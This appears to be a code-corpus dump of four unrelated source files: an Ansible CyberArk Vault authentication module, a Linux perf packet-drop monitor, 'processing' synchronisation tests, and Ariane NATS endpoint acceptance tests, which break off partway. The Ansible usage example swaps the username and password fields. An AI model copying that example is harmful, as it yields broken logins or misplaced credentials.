ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cyberark_authentication
short_description: Module for CyberArk Vault Authentication using PAS Web Services SDK
author: Edward Nunez @ CyberArk BizDev (@enunez-cyberark, @cyberark-bizdev, @erasmix)
version_added: 2.4
description:
- Authenticates to CyberArk Vault using Privileged Account Security Web Services SDK and
creates a session fact that can be used by other modules. It returns an Ansible fact
called I(cyberark_session). Every module can use this fact as C(cyberark_session) parameter.
options:
state:
default: present
choices: [present, absent]
description:
- Specifies if an authentication logon/logoff and a cyberark_session should be added/removed.
username:
description:
- The name of the user who will logon to the Vault.
password:
description:
- The password of the user.
new_password:
description:
- The new password of the user. This parameter is optional, and enables you to change a password.
api_base_url:
description:
- A string containing the base URL of the server hosting CyberArk's Privileged Account Security Web Services SDK.
validate_certs:
type: bool
default: 'yes'
description:
- If C(false), SSL certificates will not be validated. This should only
set to C(false) used on personally controlled sites using self-signed
certificates.
use_shared_logon_authentication:
type: bool
default: 'no'
description:
- Whether or not Shared Logon Authentication will be used.
use_radius_authentication:
type: bool
default: 'no'
description:
- Whether or not users will be authenticated via a RADIUS server. Valid values are true/false.
cyberark_session:
description:
- Dictionary set by a CyberArk authentication containing the different values to perform actions on a logged-on CyberArk session.
'''
EXAMPLES = '''
- name: Logon to CyberArk Vault using PAS Web Services SDK - use_shared_logon_authentication
cyberark_authentication:
api_base_url: "{{ web_services_base_url }}"
use_shared_logon_authentication: yes
- name: Logon to CyberArk Vault using PAS Web Services SDK - Not use_shared_logon_authentication
cyberark_authentication:
api_base_url: "{{ web_services_base_url }}"
username: "{{ password_object.password }}"
password: "{{ password_object.passprops.username }}"
use_shared_logon_authentication: no
- name: Logoff from CyberArk Vault
cyberark_authentication:
state: absent
cyberark_session: "{{ cyberark_session }}"
'''
RETURN = '''
cyberark_session:
description: Authentication facts.
returned: success
type: dict
sample:
api_base_url:
description: Base URL for API calls. Returned in the cyberark_session, so it can be used in subsequent calls.
type: string
returned: always
token:
description: The token that identifies the session, encoded in BASE 64.
type: string
returned: always
use_shared_logon_authentication:
description: Whether or not Shared Logon Authentication was used to establish the session.
type: bool
returned: always
validate_certs:
description: Whether or not SSL certificates should be validated.
type: bool
returned: always
'''
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib.error import HTTPError
import json
try:
import httplib
except ImportError:
# Python 3
import http.client as httplib
def processAuthentication(module):
    """
    Perform the CyberArk REST call for this module invocation: a logon when
    state=present (returning a new cyberark_session fact) or a logoff when
    state=absent (clearing it). Returns (changed, result, http_status) or
    calls module.fail_json on any error.
    """
    # Getting parameters from module
    api_base_url = module.params["api_base_url"]
    validate_certs = module.params["validate_certs"]
    username = module.params["username"]
    password = module.params["password"]
    new_password = module.params["new_password"]
    use_shared_logon_authentication = module.params[
        "use_shared_logon_authentication"]
    use_radius_authentication = module.params["use_radius_authentication"]
    state = module.params["state"]
    cyberark_session = module.params["cyberark_session"]
    # if in check mode it will not perform password changes
    if module.check_mode and new_password is not None:
        new_password = None
    # Defining initial values for open_url call
    headers = {'Content-Type': 'application/json'}
    payload = ""
    if state == "present":  # Logon Action
        # Different end_points based on the use of shared logon authentication
        if use_shared_logon_authentication:
            end_point = "/PasswordVault/WebServices/auth/Shared/RestfulAuthenticationService.svc/Logon"
        else:
            end_point = "/PasswordVault/WebServices/auth/Cyberark/CyberArkAuthenticationService.svc/Logon"
        # The payload will contain username, password
        # and optionally use_radius_authentication and new_password
        payload_dict = {"username": username, "password": password}
        if use_radius_authentication:
            payload_dict["useRadiusAuthentication"] = use_radius_authentication
        if new_password is not None:
            payload_dict["newPassword"] = new_password
        payload = json.dumps(payload_dict)
    else:  # Logoff Action
        # Get values from cyberark_session already established
        api_base_url = cyberark_session["api_base_url"]
        validate_certs = cyberark_session["validate_certs"]
        use_shared_logon_authentication = cyberark_session[
            "use_shared_logon_authentication"]
        # The session token authenticates the logoff request.
        headers["Authorization"] = cyberark_session["token"]
        # Different end_points based on the use of shared logon authentication
        if use_shared_logon_authentication:
            end_point = "/PasswordVault/WebServices/auth/Shared/RestfulAuthenticationService.svc/Logoff"
        else:
            end_point = "/PasswordVault/WebServices/auth/Cyberark/CyberArkAuthenticationService.svc/Logoff"
    result = None
    changed = False
    response = None
    try:
        response = open_url(
            api_base_url + end_point,
            method="POST",
            headers=headers,
            data=payload,
            validate_certs=validate_certs)
    except (HTTPError, httplib.HTTPException) as http_exception:
        # HTTP-level failure: report the endpoint and the server's status code.
        module.fail_json(
            msg=("Error while performing authentication."
                 "Please validate parameters provided, and ability to logon to CyberArk."
                 "\n*** end_point=%s%s\n ==> %s" % (api_base_url, end_point, to_text(http_exception))),
            payload=payload,
            headers=headers,
            status_code=http_exception.code)
    except Exception as unknown_exception:
        # Non-HTTP failure (network, SSL, ...): status_code -1 marks "no response".
        module.fail_json(
            msg=("Unknown error while performing authentication."
                 "\n*** end_point=%s%s\n%s" % (api_base_url, end_point, to_text(unknown_exception))),
            payload=payload,
            headers=headers,
            status_code=-1)
    if response.getcode() == 200:  # Success
        if state == "present":  # Logon Action
            # Result token from REST Api uses a different key based
            # the use of shared logon authentication
            token = None
            try:
                if use_shared_logon_authentication:
                    token = json.loads(response.read())["LogonResult"]
                else:
                    token = json.loads(response.read())["CyberArkLogonResult"]
            except Exception as e:
                module.fail_json(
                    msg="Error obtaining token\n%s" % (to_text(e)),
                    payload=payload,
                    headers=headers,
                    status_code=-1)
            # Preparing result of the module
            result = {
                "cyberark_session": {
                    "token": token, "api_base_url": api_base_url, "validate_certs": validate_certs,
                    "use_shared_logon_authentication": use_shared_logon_authentication},
            }
            if new_password is not None:
                # Only marks change if new_password was received resulting
                # in a password change
                changed = True
        else:  # Logoff Action clears cyberark_session
            result = {
                "cyberark_session": {}
            }
        return (changed, result, response.getcode())
    else:
        module.fail_json(
            msg="error in end_point=>" +
            end_point,
            headers=headers)
def main():
    """Module entry point: declare the argument spec and run the auth flow."""
    fields = {
        "api_base_url": {"type": "str"},
        "validate_certs": {"type": "bool",
                           "default": "true"},
        "username": {"type": "str"},
        "password": {"type": "str", "no_log": True},
        "new_password": {"type": "str", "no_log": True},
        "use_shared_logon_authentication": {"default": False, "type": "bool"},
        "use_radius_authentication": {"default": False, "type": "bool"},
        "state": {"type": "str",
                  "choices": ["present", "absent"],
                  "default": "present"},
        "cyberark_session": {"type": "dict"},
    }
    # Shared logon excludes RADIUS and password changes; a fresh logon
    # (api_base_url) and an existing session are mutually exclusive.
    mutually_exclusive = [
        ["use_shared_logon_authentication", "use_radius_authentication"],
        ["use_shared_logon_authentication", "new_password"],
        ["api_base_url", "cyberark_session"],
        ["cyberark_session", "username", "use_shared_logon_authentication"]
    ]
    # Logon needs the API URL; logoff needs the established session.
    required_if = [
        ("state", "present", ["api_base_url"]),
        ("state", "absent", ["cyberark_session"])
    ]
    required_together = [
        ["username", "password"]
    ]
    module = AnsibleModule(
        argument_spec=fields,
        mutually_exclusive=mutually_exclusive,
        required_if=required_if,
        required_together=required_together,
        supports_check_mode=True)
    (changed, result, status_code) = processAuthentication(module)
    # Publish the session (or its removal) as an Ansible fact.
    module.exit_json(
        changed=changed,
        ansible_facts=result,
        status_code=status_code)
| gpl-3.0 |
malvira/lpc31xx | tools/perf/scripts/python/net_dropmonitor.py | 4235 | 1554 | # Monitor the system for dropped packets and produce a report of drop locations and counts
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
# drop_log: kernel address (string) -> number of packet drops seen there.
# kallsyms: list of {'loc': address, 'name': symbol}, sorted by address.
drop_log = {}
kallsyms = []
def get_kallsyms_table():
	# Parse /proc/kallsyms into the module-level kallsyms list, printing
	# a progress counter (the file can be large). Silently returns if the
	# file cannot be opened (e.g. insufficient privileges).
	global kallsyms
	try:
		f = open("/proc/kallsyms", "r")
		linecount = 0
		for line in f:
			linecount = linecount+1
		f.seek(0)
	except:
		return
	j = 0
	for line in f:
		loc = int(line.split()[0], 16)
		name = line.split()[2]
		j = j +1
		if ((j % 100) == 0):
			print "\r" + str(j) + "/" + str(linecount),
		kallsyms.append({ 'loc': loc, 'name' : name})
	print "\r" + str(j) + "/" + str(linecount)
	kallsyms.sort()
	return
def get_sym(sloc):
	"""
	Map a kernel address to (symbol_name, offset) using the sorted
	kallsyms table; returns (None, 0) if the address precedes every
	known symbol (or the table could not be loaded).
	"""
	loc = int(sloc)
	# The symbol containing loc is the LAST entry whose start address is
	# <= loc, with offset = loc - start.  The previous code returned the
	# first entry at or ABOVE loc -- i.e. the wrong (next) symbol with an
	# inverted offset -- and did so with a linear scan of a sorted list.
	# Binary search for the correct entry instead.
	lo = -1
	hi = len(kallsyms)
	while hi - lo > 1:
		mid = (lo + hi) // 2
		if kallsyms[mid]['loc'] <= loc:
			lo = mid
		else:
			hi = mid
	if lo < 0:
		return (None, 0)
	entry = kallsyms[lo]
	return (entry['name'], loc - entry['loc'])
def print_drop_table():
	# Report each drop location symbolically (falling back to the raw
	# address when no symbol matches) with its drop count.
	print "%25s %25s %25s" % ("LOCATION", "OFFSET", "COUNT")
	for i in drop_log.keys():
		(sym, off) = get_sym(i)
		if sym == None:
			sym = i
		print "%25s %25s %25s" % (sym, off, drop_log[i])
def trace_begin():
	# perf hook: called once before event processing starts.
	print "Starting trace (Ctrl-C to dump results)"
def trace_end():
	# perf hook: called once after processing; resolve symbols and report.
	print "Gathering kallsyms data"
	get_kallsyms_table()
	print_drop_table()
# Called from perf when it finds a corresponding skb:kfree_skb event.
def skb__kfree_skb(name, context, cpu, sec, nsec, pid, comm,
		   skbaddr, protocol, location):
	# Tally one dropped packet against the kernel code location that freed
	# the skb; the report is printed from trace_end().  Using dict.get
	# instead of the previous bare try/except, which masked every error
	# (including KeyboardInterrupt) just to initialize a counter.
	slocation = str(location)
	drop_log[slocation] = drop_log.get(slocation, 0) + 1
| gpl-2.0 |
hortonworks/hortonworks-sandbox | desktop/core/ext-py/processing/examples/ex_synchronize.py | 3 | 6159 | #
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
    # Worker: sleep a random while, then decrement the shared 'running'
    # counter under the mutex so the parent can watch tasks finish.
    random.seed()
    time.sleep(random.random()*4)
    mutex.acquire()
    print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
    running.value -= 1
    mutex.release()
def test_value():
    # Exercise processing.Value: spawn TASKS workers sharing one counter
    # and poll (under the mutex) until every worker has decremented it.
    TASKS = 10
    running = processing.Value('i', TASKS)
    mutex = processing.Lock()
    for i in range(TASKS):
        processing.Process(target=value_func, args=(running, mutex)).start()
    while running.value > 0:
        time.sleep(0.08)
        mutex.acquire()
        print running.value,
        sys.stdout.flush()
        mutex.release()
    print
    print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
    # Producer: push 30 squares at random intervals, then a 'STOP' sentinel.
    for i in range(30):
        time.sleep(0.5 * random.random())
        queue.put(i*i)
    queue.put('STOP')
def test_queue():
    # Exercise processing.Queue: consume with a timeout until the sentinel,
    # printing 'TIMEOUT' whenever the producer is slower than 0.3s.
    q = processing.Queue()
    p = processing.Process(target=queue_func, args=(q,))
    p.start()
    o = None
    while o != 'STOP':
        try:
            o = q.get(timeout=0.3)
            print o,
            sys.stdout.flush()
        except Empty:
            print 'TIMEOUT'
    print
#### TEST_CONDITION
def condition_func(cond):
    # Child: take the lock, then notify the waiting parent after a delay.
    cond.acquire()
    print '\t' + str(cond)
    time.sleep(2)
    print '\tchild is notifying'
    print '\t' + str(cond)
    cond.notify()
    cond.release()
def test_condition():
    # Exercise processing.Condition: parent acquires twice (re-entrant),
    # waits, and is woken by the child's notify.
    cond = processing.Condition()
    p = processing.Process(target=condition_func, args=(cond,))
    print cond
    cond.acquire()
    print cond
    cond.acquire()
    print cond
    p.start()
    print 'main is waiting'
    cond.wait()
    print 'main has woken up'
    print cond
    cond.release()
    print cond
    cond.release()
    p.join()
    print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
    # Worker: run inside the semaphore (at most 3 concurrently), updating
    # the shared 'running' counter under the mutex on entry and exit.
    sema.acquire()
    mutex.acquire()
    running.value += 1
    print running.value, 'tasks are running'
    mutex.release()
    random.seed()
    time.sleep(random.random()*2)
    mutex.acquire()
    running.value -= 1
    print '%s has finished' % processing.currentProcess()
    mutex.release()
    sema.release()
def test_semaphore():
    # Exercise processing.Semaphore: 10 workers throttled to 3 at a time.
    sema = processing.Semaphore(3)
    mutex = processing.RLock()
    running = processing.Value('i', 0)
    processes = [
        processing.Process(target=semaphore_func, args=(sema, mutex, running))
        for i in range(10)
    ]
    for p in processes:
        p.start()
    for p in processes:
        p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
    # Child: sleep longer than any single join() timeout in the parent.
    print '\tchild sleeping'
    time.sleep(5.5)
    print '\n\tchild terminating'
def test_join_timeout():
    # Exercise Process.join(timeout=...): poll once per second until the
    # child actually exits.
    p = processing.Process(target=join_timeout_func)
    p.start()
    print 'waiting for process to finish'
    while 1:
        p.join(timeout=1)
        if not p.isAlive():
            break
        print '.',
        sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
    # Worker: block on the shared event until the parent sets it.
    print '\t%r is waiting' % processing.currentProcess()
    event.wait()
    print '\t%r has woken up' % processing.currentProcess()
def test_event():
    # Exercise processing.Event: five waiters released by a single set().
    event = processing.Event()
    processes = [processing.Process(target=event_func, args=(event,))
                 for i in range(5)]
    for p in processes:
        p.start()
    print 'main is sleeping'
    time.sleep(2)
    print 'main is setting event'
    event.set()
    for p in processes:
        p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
    # Child: verify that every shared Value/Array matches the plain data
    # it was constructed from, as seen from another process.
    for i in range(len(values)):
        v = values[i][1]
        sv = shared_values[i].value
        assert v == sv
    for i in range(len(values)):
        a = arrays[i][1]
        sa = list(shared_arrays[i][:])
        assert a == sa
    print 'Tests passed'
def test_sharedvalues():
    # Exercise processing.Value/Array round-tripping across processes for
    # several typecodes ('i', 'h', 'd', 'H').
    values = [
        ('i', 10),
        ('h', -2),
        ('d', 1.25)
    ]
    arrays = [
        ('i', range(100)),
        ('d', [0.25 * i for i in range(100)]),
        ('H', range(1000))
    ]
    shared_values = [processing.Value(id, v) for id, v in values]
    shared_arrays = [processing.Array(id, a) for id, a in arrays]
    p = processing.Process(
        target=sharedvalues_func,
        args=(values, arrays, shared_values, shared_arrays)
    )
    p.start()
    p.join()
    assert p.getExitCode() == 0
####
def test(namespace=processing):
    # Run every scenario against the given namespace (real processes, a
    # manager proxy, or the thread-based processing.dummy backend).
    global processing
    processing = namespace
    for func in [ test_value, test_queue, test_condition,
                  test_semaphore, test_join_timeout, test_event,
                  test_sharedvalues ]:
        print '\n\t######## %s\n' % func.__name__
        func()
    ignore = processing.activeChildren()      # cleanup any old processes
    if hasattr(processing, '_debugInfo'):
        info = processing._debugInfo()
        if info:
            print info
            raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
    # Select the backend from argv: plain processes (default), a manager
    # proxy namespace, or threads via processing.dummy.
    processing.freezeSupport()
    assert len(sys.argv) in (1, 2)
    if len(sys.argv) == 1 or sys.argv[1] == 'processes':
        print ' Using processes '.center(79, '-')
        namespace = processing
    elif sys.argv[1] == 'manager':
        print ' Using processes and a manager '.center(79, '-')
        namespace = processing.Manager()
        namespace.Process = processing.Process
        namespace.currentProcess = processing.currentProcess
        namespace.activeChildren = processing.activeChildren
    elif sys.argv[1] == 'threads':
        print ' Using threads '.center(79, '-')
        import processing.dummy as namespace
    else:
        print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
        raise SystemExit, 2
    test(namespace)
| apache-2.0 |
echinopsii/net.echinopsii.ariane.community.cli.python3 | tests/acceptance/mapping/endpoint_nats_at.py | 1 | 19692 | # Ariane CLI Python 3
# Endpoint acceptance tests
#
# Copyright (C) 2015 echinopsii
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import unittest
from ariane_clip3.driver_factory import DriverFactory
from ariane_clip3.mapping import MappingService, Node, Container, Endpoint, EndpointService, SessionService
__author__ = 'mffrench'
class EndpointTest(unittest.TestCase):
    """Acceptance tests for the mapping ``Endpoint`` API over the NATS driver.

    NOTE(review): these are acceptance tests, not unit tests — they assume a
    reachable Ariane NATS endpoint on localhost:4222 (see ``setUpClass``).
    A container/node pair is created once per class and reused as the default
    parent for the endpoints created by each test.
    """
    # Shared fixtures, populated in setUpClass and removed in tearDownClass.
    mapping_service = None
    container1 = None
    node1 = None
    @classmethod
    def setUpClass(cls):
        # Open the mapping service over NATS and create the shared
        # container1/node1 fixtures every test attaches endpoints to.
        client_properties = {
            'product': 'Ariane CLI Python 3',
            'information': 'Ariane - Mapping Endpoint Test',
            'ariane.pgurl': 'ssh://' + socket.gethostname(),
            'ariane.osi': 'localhost',
            'ariane.otm': 'ArianeOPS',
            'ariane.app': 'Ariane',
            'ariane.cmp': 'echinopsii'
        }
        args = {'type': 'NATS', 'user': 'ariane', 'password': 'password', 'host': 'localhost',
                'port': 4222, 'rpc_timeout': 10, 'rpc_retry': 2, 'client_properties': client_properties}
        cls.mapping_service = MappingService(args)
        cls.container1 = Container(name="test_node_container1", gate_uri="ssh://my_host/docker/test_node_container1",
                                   primary_admin_gate_name="container name space (pid)", company="Docker",
                                   product="Docker", c_type="container")
        cls.container1.save()
        cls.node1 = Node(name="mysqld", container_id=cls.container1.id)
        cls.node1.save()
    @classmethod
    def tearDownClass(cls):
        # Remove the shared fixtures, then shut the driver down.
        cls.node1.remove()
        cls.container1.remove()
        cls.mapping_service.stop()
    def test_create_remove_endpoint_basic(self):
        # save() registers the endpoint on its parent node; remove() (which
        # returns None on success) deregisters it. node1 must be sync()'d to
        # observe the server-side change.
        endpoint = Endpoint(url="mysql://test_create_remove_endpoint_basic:4385", parent_node_id=self.node1.id)
        endpoint.save()
        self.assertIsNotNone(endpoint.id)
        self.node1.sync()
        self.assertTrue(endpoint.id in self.node1.endpoints_id)
        self.assertIsNone(endpoint.remove())
        self.node1.sync()
        self.assertFalse(endpoint.id in self.node1.endpoints_id)
    def test_create_remove_endpoint_parent_node(self):
        # Same lifecycle as above, but the parent is given as a Node object
        # (parent_node=) instead of an id (parent_node_id=).
        container2 = Container(name="test_create_remove_endpoint_parent_node_container2",
                               gate_uri="ssh://my_host/docker/test_create_remove_endpoint_parent_node_container2",
                               primary_admin_gate_name="container name space (pid)", company="Docker",
                               product="Docker", c_type="container")
        node2 = Node(name="mysqld", container=container2)
        node2.save()
        endpoint2 = Endpoint(url="mysql://test_create_remove_endpoint_parent_node_container2:4385", parent_node=node2)
        endpoint2.save()
        self.assertIsNotNone(endpoint2.id)
        self.assertTrue(endpoint2.id in node2.endpoints_id)
        self.assertIsNone(endpoint2.remove())
        self.assertFalse(endpoint2.id in node2.endpoints_id)
        node2.remove()
        container2.remove()
    def test_find_endpoint_by_id(self):
        # find_endpoint(eid=...) resolves a saved endpoint and returns None
        # once it has been removed.
        endpoint = Endpoint(url="mysql://test_find_endpoint_by_id_container1:4385", parent_node_id=self.node1.id)
        endpoint.save()
        self.assertIsNotNone(EndpointService.find_endpoint(eid=endpoint.id))
        endpoint.remove()
        self.assertIsNone(EndpointService.find_endpoint(eid=endpoint.id))
    def test_find_endpoint_by_url(self):
        # Same as by-id lookup, keyed on the endpoint URL.
        endpoint = Endpoint(url="mysql://test_find_endpoint_by_url_container1:4385", parent_node_id=self.node1.id)
        endpoint.save()
        self.assertIsNotNone(EndpointService.find_endpoint(url=endpoint.url))
        endpoint.remove()
        self.assertIsNone(EndpointService.find_endpoint(url=endpoint.url))
    def test_find_endpoint_by_selector(self):
        # Selector queries return a list; cid/nid narrow the search to a
        # container or node scope.
        endpoint = Endpoint(url="mysql://test_find_endpoint_by_selector_container1:4385", parent_node_id=self.node1.id)
        endpoint.save()
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
        endpoint.remove()
        self.assertIsNone(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
    def test_get_endpoints(self):
        # get_endpoints() lists every endpoint known to the mapping service.
        endpoint = Endpoint(url="mysql://test_get_endpoints_container1:4385", parent_node_id=self.node1.id)
        endpoint.save()
        self.assertTrue(endpoint in EndpointService.get_endpoints())
        endpoint.remove()
        self.assertFalse(endpoint in EndpointService.get_endpoints())
    def test_endpoint_properties(self):
        # Properties added/deleted with sync=False are staged locally and only
        # pushed to the server by the next save(); `properties` stays None (or
        # stale) until then — that is what the intermediate asserts check.
        endpoint = Endpoint(url="mysql://test_endpoint_properties_container1:4385", parent_node_id=self.node1.id)
        endpoint.add_property(('int_prop', 10), sync=False)
        endpoint.add_property(('long_prop', 10000000), sync=False)
        endpoint.add_property(('double_prop', 3.1414), sync=False)
        endpoint.add_property(('boolean_prop', True), sync=False)
        endpoint.add_property(('string_prop', "value"), sync=False)
        datacenter = {"dc": "Sagittarius", "gpsLng": 2.251088, "address": "2 rue Baudin", "gpsLat": 48.895345,
                      "town": "Courbevoie", "country": "France"}
        endpoint.add_property(('map_prop_datacenter', datacenter), sync=False)
        endpoint.add_property(('array_prop', [1, 2, 3, 4, 5]), sync=False)
        self.assertIsNone(endpoint.properties)
        endpoint.save()
        self.assertTrue('boolean_prop' in endpoint.properties)
        self.assertTrue('double_prop' in endpoint.properties)
        self.assertTrue('int_prop' in endpoint.properties)
        self.assertTrue('long_prop' in endpoint.properties)
        self.assertTrue('map_prop_datacenter' in endpoint.properties)
        self.assertTrue('string_prop' in endpoint.properties)
        self.assertTrue('array_prop' in endpoint.properties)
        endpoint.del_property('int_prop', sync=False)
        endpoint.del_property('long_prop', sync=False)
        endpoint.del_property('double_prop', sync=False)
        endpoint.del_property('boolean_prop', sync=False)
        endpoint.del_property('string_prop', sync=False)
        endpoint.del_property('map_prop_datacenter', sync=False)
        endpoint.del_property('array_prop', sync=False)
        # Deletions staged with sync=False are not visible yet:
        self.assertTrue('boolean_prop' in endpoint.properties)
        self.assertTrue('double_prop' in endpoint.properties)
        self.assertTrue('int_prop' in endpoint.properties)
        self.assertTrue('long_prop' in endpoint.properties)
        self.assertTrue('map_prop_datacenter' in endpoint.properties)
        self.assertTrue('string_prop' in endpoint.properties)
        self.assertTrue('array_prop' in endpoint.properties)
        endpoint.save()
        self.assertFalse(endpoint.properties is not None and 'boolean_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'double_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'int_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'long_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'map_prop_datacenter' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'string_prop' in endpoint.properties)
        self.assertFalse(endpoint.properties is not None and 'array_prop' in endpoint.properties)
        endpoint.remove()
    def test_twin_endpoints_link(self):
        # Twin links are symmetric: adding/removing on one endpoint is
        # reflected on the other once the pending change is saved (or
        # immediately when called without sync=False).
        container2 = Container(name="test_twin_endpoints_link_container2",
                               gate_uri="ssh://my_host/docker/test_twin_endpoints_link_container2",
                               primary_admin_gate_name="container name space (pid)", company="Docker",
                               product="Docker", c_type="container")
        node2 = Node(name="mysqld2", container=container2)
        endpoint1 = Endpoint(url="mysql://test_twin_endpoints_link_container1:4385", parent_node_id=self.node1.id)
        endpoint2 = Endpoint(url="mysql://test_twin_endpoints_link_container2:4385", parent_node=node2)
        endpoint1.add_twin_endpoint(endpoint2, sync=False)
        self.assertTrue(endpoint2 in endpoint1.twin_endpoints_2_add)
        endpoint1.save()
        self.assertFalse(endpoint2 in endpoint1.twin_endpoints_2_add)
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.del_twin_endpoint(endpoint1, sync=False)
        self.assertTrue(endpoint1 in endpoint2.twin_endpoints_2_rm)
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.save()
        self.assertFalse(endpoint1 in endpoint2.twin_endpoints_2_rm)
        self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint1.add_twin_endpoint(endpoint2)
        self.assertTrue(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertTrue(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint2.del_twin_endpoint(endpoint1)
        self.assertFalse(endpoint2.id in endpoint1.twin_endpoints_id)
        self.assertFalse(endpoint1.id in endpoint2.twin_endpoints_id)
        endpoint1.remove()
        endpoint2.remove()
        node2.remove()
        container2.remove()
    def test_transac_create_remove_endpoint_basic(self):
        # Transactional variant: operations happen inside an open session and
        # become durable on SessionService.commit().
        SessionService.open_session("test_transac_create_remove_endpoint_basic")
        endpoint = Endpoint(url="mysql://test_transac_create_remove_endpoint_basic_container1:4385",
                            parent_node_id=self.node1.id)
        endpoint.save()
        SessionService.commit()
        self.assertIsNotNone(endpoint.id)
        self.node1.sync()
        self.assertTrue(endpoint.id in self.node1.endpoints_id)
        self.assertIsNone(endpoint.remove())
        self.node1.sync()
        self.assertFalse(endpoint.id in self.node1.endpoints_id)
        SessionService.commit()
        SessionService.close_session()
    def test_transac_create_remove_endpoint_parent_node(self):
        # Transactional variant of the parent_node= creation flow.
        SessionService.open_session("test_transac_create_remove_endpoint_parent_node")
        container2 = Container(name="test_transac_create_remove_endpoint_parent_node_container2",
                               gate_uri="ssh://my_host/docker/test_container2",
                               primary_admin_gate_name="container name space (pid)", company="Docker",
                               product="Docker", c_type="container")
        node2 = Node(name="mysqld", container=container2)
        node2.save()
        SessionService.commit()
        endpoint2 = Endpoint(url="mysql://test_transac_create_remove_endpoint_parent_node_container1:4385",
                             parent_node=node2)
        endpoint2.save()
        SessionService.commit()
        self.assertIsNotNone(endpoint2.id)
        self.assertTrue(endpoint2.id in node2.endpoints_id)
        self.assertIsNone(endpoint2.remove())
        self.assertFalse(endpoint2.id in node2.endpoints_id)
        node2.remove()
        container2.remove()
        SessionService.commit()
        SessionService.close_session()
    def test_transac_get_endpoints(self):
        # Lookups are checked both before and after commit: inside the
        # session the uncommitted endpoint is already visible.
        SessionService.open_session("test_transac_get_endpoints")
        endpoint = Endpoint(url="mysql://test_transac_get_endpoints_container1:4385",
                            parent_node_id=self.node1.id)
        endpoint.save()
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
        self.assertTrue(endpoint in EndpointService.get_endpoints())
        SessionService.commit()
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
        self.assertTrue(endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
        self.assertTrue(endpoint in EndpointService.get_endpoints())
        endpoint.remove()
        self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
                         endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'"))
        self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
                         endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", cid=self.container1.id))
        self.assertFalse(EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'") is not None and
                         endpoint in EndpointService.find_endpoint(selector="endpointURL =~ 'mysql:.*'", nid=self.node1.id))
        self.assertFalse(endpoint in EndpointService.get_endpoints())
        SessionService.commit()
        self.assertFalse(endpoint in EndpointService.get_endpoints())
        SessionService.close_session()
    def test_transac_endpoint_properties(self):
        # Transactional variant of test_endpoint_properties; each save() is
        # followed by a commit before the server state is asserted.
        SessionService.open_session("test_transac_endpoint_properties")
        endpoint = Endpoint(url="mysql://test_transac_endpoint_properties_container1:4385",
                            parent_node_id=self.node1.id)
        endpoint.add_property(('int_prop', 10), sync=False)
        endpoint.add_property(('long_prop', 10000000), sync=False)
        endpoint.add_property(('double_prop', 3.1414), sync=False)
        endpoint.add_property(('boolean_prop', True), sync=False)
        endpoint.add_property(('string_prop', "value"), sync=False)
        datacenter = {"dc": "Sagittarius", "gpsLng": 2.251088, "address": "2 rue Baudin", "gpsLat": 48.895345,
                      "town": "Courbevoie", "country": "France"}
        endpoint.add_property(('map_prop_datacenter', datacenter), sync=False)
